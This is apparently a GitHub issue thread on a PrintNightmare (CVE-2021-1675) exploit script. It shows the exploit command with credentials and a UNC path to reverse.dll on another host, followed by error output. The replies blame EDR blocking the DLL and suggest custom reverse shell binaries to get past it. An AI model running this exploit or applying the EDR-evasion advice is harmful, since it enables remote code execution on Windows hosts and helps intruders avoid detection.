cube0x0/CVE-2021-1675

SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been clo

czz1233 opened this issue · 3 comments

sudo python3 CVE-2021-1675.py test.local/chen:123.com@192.168.121.136 '\192.168.121.128\smb\reverse.dll'
[*] Connecting to ncacn_np:192.168.121.136[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_ce3301b66255a0fb\Amd64\UNIDRV.DLL
[*] Executing ??\UNC\192.168.121.128\smb\reverse.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
Traceback (most recent call last):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 597, in readFile
bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1975, in read_andx
return self.read(tid, fid, offset, max_size, wait_answer)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1312, in read
if ans.isValidAnswer(STATUS_SUCCESS):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3structs.py", line 454, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been closed.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/home/kali/CVE-2021-1675.py", line 192, in <module>
main(dce, pDriverPath, options.share)
File "/home/kali/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 857, in request
answer = self.recv()
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1308, in recv
response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 547, in recv
return self.__smb_connection.readFile(self.__tid, self.__handle)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 603, in readFile
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been closed.)

Hello! This error happens to me because my EDR detects and blocks the dll. Try making another dll or exe file and this error will disappear.

How did you solve it?

I stopped generating a DLL with msfvenom! I wrote my own reverse shell exe and experimented, and I searched here on GitHub for reverse shell DLLs to test, and this error stopped.